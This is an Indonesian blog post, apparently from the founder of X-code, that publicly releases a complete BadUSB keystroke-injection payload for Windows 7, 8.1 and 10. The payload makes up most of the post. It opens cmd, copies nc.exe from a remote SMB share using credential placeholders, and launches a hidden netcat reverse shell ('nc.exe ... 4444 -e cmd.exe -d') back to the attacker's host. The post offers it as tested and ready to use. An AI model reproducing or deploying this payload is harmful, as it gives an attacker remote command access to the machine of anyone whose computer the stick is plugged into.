Payload untuk BadUSB Super X-code 2.0

BadUSB Super X-code adalah Stick BadUSB yang dirancang untuk melakukan eksploitasi pada komputer melalui celah badusb.

X-code meluncurkan x-code badusb v1.0 pada tahun 2015 dan ditutup ditahun 2016 karena kehabisan stok.

Di bawah ini videonya.

Pada tahun 2018, X-code meluncurkan BadUSB Super X-code 2.0, lebih stabil dan jauh lebih baik dibandingkan versi 1.0

Di bawah ini bentuk USB Super X-code v2.0

Saat ini stok untuk semua badusb X-code sudah habis tapi bagi pengguna X-code USB Super X-code dapat menggunakan support cara menggunakannya di http://xcodetraining.com/badusb/

Jika anda memiliki Stick BadUSB tapi bukan dari X-code, saya kurniawan, founder x-code memberikan payload USB Super X-code 2.0 untuk publik, lisensi yang saya berikan pada payload ini adalah GNU General Public License.

Source code payload yang saya buat, support untuk remote Windows 7, 8.1 dan 10, dan telah diuji berjalan stabil.

REM Title: Netcat Reverse shell untuk Windows 7, Windows 8.1 & Windows 10 dengan pemanfaatan penggunaan share smb di komputer pentester  
REM Author : Kurniawan. trainingxcode@gmail.com. xcode.or.id
REM Version : 1.0
REM Description : Payload ini dirancang khusus oleh Kurniawan untuk BadUSB Super X-code 2.0 ( http://xcode.or.id/usbsuperxcode2 ), payload ini menggunakan gabungan perintah universal, seperti penggunaan CONTROL ESCAPE tapi juga untuk keluar dari cmd menggunakan ALT SPACE dan STRING C sehingga kompatibel dengan banyak windows (Windows 7, 8.1 dan 10), selain itu juga netcat berjalan secara tersembunyi dengan perintah nc.exe (ip publik / domain / subdomain) 4444 -e cmd.exe -d. Kelebihan penggunaan netcat dibandingkan menggunakan backdoor lain adalah netcat menerima domain / sub domain saat netcat melakukan koneksi ke komputer kita / pentester. 
DELAY 1000
CONTROL ESCAPE
DELAY 1000
STRING RUN
DELAY 1000
ENTER
DELAY 1000
STRING cmd
DELAY 1000
ENTER
DELAY 500
STRING taskkill /f /pid nc.exeDELAY 200
ENTER
DELAY 200
STRING del c:\Users\Public\Downloads\nc.exe
DELAY 200
ENTER
DELAY 3000
STRING net use z: /delete
DELAY 200
ENTER
DELAY 200
STRING net use z: \\(ip public / domain / sub domain)\(nama folder yang dishare) /u:(username)
(password)
DELAY 200
ENTER
DELAY 200
STRING copy z:\nc.exe c:\Users\Public\Downloads
DELAY 200
ENTER
DELAY 3000
STRING y
DELAY 200
ENTER
DELAY 200
STRING net use z: /delete
DELAY 200
ENTER
DELAY 1000
STRING c:\Users\Public\Downloads\nc.exe (ip publik / domain / subdomain) 4444 -e cmd.exe -d
DELAY 200
ENTER
DELAY 3000
ALT SPACE
STRING C
DELAY 200

Selain dari blog ini, anda dapat mengakses source code payloadnya di https://github.com/kurniawandata/Payload-BadUSB-Super-X-code.

Kurniawan

Founder X-code

 

Leave a Reply

Your email address will not be published. Required fields are marked *